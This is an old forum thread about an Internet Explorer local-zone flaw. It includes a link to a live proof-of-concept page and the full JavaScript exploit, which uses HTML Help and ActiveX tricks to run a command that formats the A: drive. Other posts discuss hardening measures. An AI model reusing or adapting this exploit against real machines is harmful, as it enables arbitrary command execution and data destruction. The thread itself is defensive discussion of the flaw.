Internet Explorer: serious flaw

wwx.dino-soft.org/auto.html

note: prefix altered in "wwx". Needs to be reversed into "www" to make the URL work - Forum Admin

The above url when viewed WILL FORMAT THE A:\ drive when viewed on a fully updated and patched windows system. If you go there make sure there is nothing in the A:\ that formating will harm; because this has been tested
and works on Windows 2000 WinXP/home/corp/pro Win98/SE.

This is a harmless POC to give you experts here a heads up; because Microsoft HAS been informed of the hole; but they seem to be sitting on there hands maybe much like the recent XP hole that they knew about before XP even shipped; but chose to wait until SP1 to correct.

This is VERY DANGEROUS, and this little harmless POC could quite easy be made to be quite nasty; but when the author of the original hole who's hole I have sort of legoised and made to work a very little bit differently Microsoft had this to say to the original author:

"Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A
fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".

quoted from elsewhere - Forum Admin

 

I'm not sure I understand the quoted Microsoft response. I looked at that site and it simply depends upon JavaScript, which I for one have disabled in the Internet Zone in IE. What I don't understand is the reference they make to the "local computer zone" (wasn't that the previous name for what is now called the "My Computer" zone?), I don't see how this relates to any other zone than the Internet Zone.

This flaw gives people all the more reason to tighten up their security settings in IE (which is what I've done) or use another browser. I went to that site and nothing happened. Having scripting, ActiveX and Java disabled by default in the IE Internet Zone and then adding a list of trusted sites to the Trusted Zone and using something like IE-SpyAd for the Restricted Zone seems to address this type of POC exploit.

Maybe I'm missing something.

 

IMHO: that's the trick.

snap,

Read LowWaterMark's reply

regards.

paul

 

Apologies - I'm hijacking a thread elsewhere now :

"This requires Active Scripting turned on to run:

<script LANGUAGE="JavaScript">

prog = 'command';
args = '/k format a: /autotest';

if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mkMSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();c3.Click();");
close();
}
</script>"

regards,

paul

 

It most probably will work on - estimated guess - 90% from IE users, since not that many are pc/security savvy. Indeed: what if.. .

regards.

paul

 

I'd have to guess that the "local computer zone" (aka. My Computer Zone) security settings come into play when IE Help is opened (or thru the link beginning with "res:", which is local PC, as well) and then the script tries to pass the necessary format command and parameters over to that window to be run...

The key then is to not let such a site run any javascript in the first place, which is what exposes the actual zone relate flaw to exploitation.

Yeah, I still stand by the concept of hardening your IE zones and populating the sites lists appropriately to protect against this and future unknown exploits.

 

Bethrezen,

It sounds like you got what Jack and Javacool got and it did not do what it was supposed to do, which was format a floppy in the A:\ drive. Edit: Opps, and Pieter, as well.

 

In case you'll set active scripting to "prompt" in the scripting section, you will be safe.

regards.

paul

 

JacK,

That seems just another solution . For those interested, here's the link for this nifty small freeware app:

www.nsclean.com/dsostop.html

A copy can be grabbed from our downloads page as well.

regards.

paul